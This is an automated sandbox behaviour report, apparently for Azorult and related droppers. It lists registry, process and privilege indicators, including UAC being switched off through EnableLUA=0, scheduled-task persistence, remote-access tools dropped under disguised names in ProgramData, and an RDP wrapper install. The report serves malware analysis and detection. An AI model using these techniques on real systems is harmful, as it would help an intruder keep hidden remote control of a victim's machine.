| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\install\cheat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\microsoft\intel\P.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Microsoft\Intel\winlog.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\rdp\RDPWInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\rdp\RDPWInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows\rutserv.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Windows\winit.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133875095988231419" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-976934595-4290022905-4081117292-1000\{A51D9435-B45B-4FC6-BDEB-13BDC0779CC0} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000_Classes\MIME\Database | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000_Classes\Local Settings | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\ProgramData\Windows\winit.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\melter.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\winit.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\programdata\install\cheat.exe | N/A |
| N/A | N/A | C:\programdata\install\ink.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\P.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\R8.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\winlogon.exe | N/A |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| N/A | N/A | C:\Programdata\WindowsTask\winlogon.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://pixeldrain.com/u/TcV2BREC
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x250,0x7fff38c9f208,0x7fff38c9f214,0x7fff38c9f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1964,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=1928 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2092,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:11
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1768,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=1816 /prefetch:13
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3456,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4924,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=4916 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4732,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=4948 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5376,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=5400 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5764,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=5776 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5748,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
cookie_exporter.exe --cookie-json=1124
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5748,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5396,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=6112 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6300,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=6364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=5532,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=5528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
